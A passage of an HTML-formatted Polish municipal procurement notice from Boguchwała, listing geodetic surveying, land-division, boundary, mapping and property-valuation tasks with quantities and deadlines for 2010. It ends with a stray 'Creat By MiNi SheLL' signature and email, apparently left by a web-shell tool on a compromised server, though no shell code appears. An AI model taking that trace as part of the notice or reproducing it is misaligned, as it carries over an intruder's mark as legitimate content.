a. 40 dni kalendarzowych - gdy z podziału powstaje do 10 nowych działek
b. 70 dni kalendarzowych - gdy z podziału powstaje do 30 nowych działek
c. 110 dni kalendarzowych - gdy z podziału powstaje powyżej 30 nowych działek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3
Sporządzenie podziałów geodezyjnych nieruchomości gruntowych określonych granicami obrębów: Zgłobień, Wola Zgłobieńska, Niechobrz, Mogielnica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje wykonanie następującej ilości usług:
dwie pierwsze działki powstałe z podziału w danym zleceniu: -10 podziałów
 do 10 w danym zleceniu :- 22 podziałów
do 30 w danym zleceniu: - 20 podziały
 działki powstałej z podziału powyżej 30 w danym zleceniu -  1  podział                                                                              

Operaty podziałowe wykonywane w ramach zadania  winny zwierać :
a)wstępny projekt podziału
b)projekt podziału(mapa +wykaz zmian gruntowych) - 3 egzemplarze
c)aktualny wypis z rejestru gruntów  

Termin realizacji:
1. Sporządzenie wstępnego projektu podziału - 14 dni  kalendarzowych (liczone od daty  otrzymania zlecenia)
2. Sporządzenie ostatecznego podziału licząc od daty powiadomienia Wykonawcy przez Zamawiającego o uzyskaniu postanowienia Referatu Gospodarki gruntami zatwierdzającego wstępny projekt podziału;
a. 40 dni kalendarzowych - gdy z podziału powstaje do 10 nowych działek
b. 70 dni kalendarzowych - gdy z podziału powstaje do 30 nowych działek
c. 110 dni kalendarzowych - gdy z podziału powstaje powyżej 30 nowych działe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Rozgraniczenia nieruchomości obejmujących obszar wszystkich obrębów gminy Boguchwała..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje wykonanie następującej ilości usług:
ustalenie granicy  nieruchomości do 2 pkt. (ryczałt) - 6 rozgraniczeń       
ustalenie granicy  nieruchomości do 10 pkt. - 13 rozgraniczeń
ustalenie granicy  nieruchomości powyżej 10 pkt.-  1 rozgraniczenie
Dokumentacja winna zawierać zasób bazowy dla Zamawiającego

Termin realizacji:
 Rozgraniczenia nieruchomości będą wykonywane po wydaniu postanowienia o wszczęciu  postępowania rozgraniczeniowego i zakończone decyzją administracyjną. Termin wykonania rozgraniczenia do 90 dni kalendarzowych od daty otrzymania zlecenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5
Aktualizacja map dla celów projektowych obejmujących obszar wszystkich obrębów gminy Boguchwała..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje wykonanie następującej ilości usług:
aktualizacja map dla celów projektowych wraz z uzgodnieniami w ZUDP :
a)działka do 0.5 ha - 1 zlecenie do 0,5 ha               
b) pierwszy hektar 
c) każdy następny rozpoczęty hektar 2 zlecenia-  2,5 ha              

Dokumentacja winna zawierać mapę do celów projektowych wraz z klauzulą Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej. 

Termin realizacji:
Zadanie związane z aktualizacją map dla celów projektowych będzie realizowane   
zgodnie ze zleceniem w terminie do 60 dni kalendarzowych od daty otrzymania zlecenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6
Inwentaryzacja powykonawcza obiektu obejmująca obszar wszystkich obrębów gminy Boguchwała..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje wykonanie następującej ilości usług:
obiekt  liniowy (pierwszy hektometr) - 2 hektometry
każdy następny hektometr - 2 hektometry

Dokumentacja winna zawierać mapę inwentaryzacji powykonawczej wraz z opinią ZUD. 

Termin realizacji: 
 Inwentaryzacja powykonawcza obiektu będzie realizowana zgodnie ze zleceniem w terminie do 40 dni kalendarzowych od daty otrzymania zlecenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7
Wznowienia punktów granicznych na podstawie istniejących materiałów geodezyjnych wraz ze stabilizacją punktów granicznych znakami betonowymi obejmujących obszar wszystkich obrębów gminy Boguchwała..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje wykonanie następującej ilości usług:
wznowienie pkt. granicznych do 4 pkt. - 7 wznowień                                                                                                                                                 
wznowienie pkt. granicznych do 20 pkt.- 21 wznowień                                                                                                                                          
wznowienie pkt. granicznych powyżej 20 pkt.- 5 wznowień        
Dokumentacja winna zawierać :
a) protokół stabilizacji punktów granicznych wraz ze szkicem polowym i kopią mapy zasadniczej przedstawiająca położenie punktów. 
                                                              
Termin realizacji:
Wznowienie punktów granicznych:
 a. 20 dni kalendarzowych od daty otrzymania zlecenia - gdy wznowienie obejmuje do  4 pkt.
 b. 40 dni kalendarzowych od daty otrzymania zlecenia- gdy wznowienie obejmuje do 20 pkt.
c. 60 dni kalendarzowych od daty otrzymania zlecenia - gdy wznowienie obejmuje powyżej 20 pkt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8
Wykonanie dokumentacji dla celów prawnych w sołectwach -  Racławówka, Niechobrz , Nosówka, Zgłobień, Wola Zgłobieńska..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje wykonanie następującej ilości usług:
pierwsza działka w jednej  pozycji rejestrowej -  10 działek
każda następna w danej pozycji rejestrowej  - 5 działek
W ramach zlecenia wykonawca  obowiązany jest doręczyć zleceniodawcy:
a) mapę ewidencji gruntów  wraz z synchronizację,
b) przedłożenia dokumentu stwierdzającego stan prawny nieruchomości,

Termin realizacji:
Wykonanie dokumentacji dla celów prawnych
 a. 50 dni kalendarzowych od daty otrzymania zlecenia - gdy dokumentacja obejmuje do 10 działek
 b. 60 dni kalendarzowych od daty otrzymania zlecenia - gdy dokumentacja obejmuje powyżej 10 działek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10
Wykonanie operatów szacunkowych nieruchomości , obejmujących obszar wszystkich obrębów gminy Boguchwała..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje wykonanie następującej ilości usług:
a) wykonanie operatu szacunkowego  pojedynczej działki gruntowej niezabudowanej-13        
b)wykonanie operatu szacunkowego pojedynczej działki gruntowej zabudowanej  - 4               
c)wykonanie operatu szacunkowego  lokalu -9 
d)wykonanie operatu szacunkowego  garażu - 1

W ramach zlecenia wykonawca jest zobowiązany przedłożyć 
- operat szacunkowy - 2 egzemplarze 

Termin realizacji:
Wykonanie operatów  szacunkowych nieruchomości
- operaty szacunkowe dla pojedynczej działki gruntowej  niezabudowanej - do 30 dni (od daty otrzymania zlecenia).
- operaty szacunkowe dla pojedynczej działki gruntowej  zabudowanej - do 30 dni (od daty otrzymania zlecenia).
- operaty szacunkowe - wycena lokalu - do 30 dni (od daty otrzymania zlecenia).
- operaty szacunkowe - wycena garażu - do 30 dni (od daty otrzymania zlecenia)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie 11
Opracowanie dokumentacji formalno - prawnej do komunalizacji mienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje wykonanie następującej ilości usług:
wykonanie dokumentacji geodezyjno-prawnej wraz z zebraniem dokumentów niezbędnych do założenia ksiąg wieczystych - 20 działek

Przedmiotem zamówienia jest zlecenie opracowania dokumentacji dla około 20 działek do komunalizacji, tj. założenia księgi wieczystej, a następnie uzyskania decyzji Wojewody Podkarpackiego.
Na podstawie art. 5 ust.1  lub art.7 ust.1 ustawy z dnia 10 maja 1990 r. Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę o pracownikach samorządowych działki te z mocy prawa stały się własnością gminy Boguchwała. W celu uzyskania decyzji deklaratoryjnej niezbędne jest ujawnienie prawa własności. W tym celu niezbędne jest zlecenie opracowania dokumentacji prawnej.  Z uwagi na skomplikowany, indywidualny charakter każdej dokumentacji polegającej na tym iż oprócz sporządzenia wyrysu wraz z wykazem synchronizacyjnym (badaniem hipotecznym) niezbędne jest odszukanie dokumentów potwierdzających przejście danej  nieruchomości na Skarb Państwa tj. Aktu własności Ziemi, decyzji przekazania na Skarb Państwa, decyzje wymienne, postanowienia sądowe.   
W ramach zlecenia wykonawca  obowiązany jest doręczyć zleceniodawcy:
a) mapę ewidencji gruntów  wraz z synchronizację,
b) w razie potrzeby Wykonawca zobowiązany jest do przedłożenia dokumentu ustalające poprzedniego właściciela nieruchomości,
c)dokumentu stwierdzającego przejście nieruchomości na Skarb państwa. 
Termin realizacji pojedynczego zamówienia będzie wynosił 4-mce od dnia otrzymania zlecenia. Wykonanie  poszczególnych prac będzie zlecane sukcesywnie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9:
Wykonanie dokumentacji dla celów prawnych w sołectwach -  Boguchwała, Mogielnica ,  Kielanówka, Zarzecze, Lutoryż..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje wykonanie następującej ilości usług:
pierwsza działka w jednej  pozycji rejestrowej -  10 działek
każda następna w danej pozycji rejestrowej  - 5 działek
W ramach zlecenia wykonawca  obowiązany jest doręczyć zleceniodawcy:
a/mapę ewidencji gruntów  wraz z synchronizację,
b/ przedłożenia dokumentu stwierdzającego stan prawny nieruchomości,

Termin realizacji:
Wykonanie dokumentacji dla celów prawnych
 a. 50 dni kalendarzowych od daty otrzymania zlecenia - gdy dokumentacja obejmuje do 10 działek
 b. 60 dni kalendarzowych od daty otrzymania zlecenia - gdy dokumentacja obejmuje powyżej 10 działek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com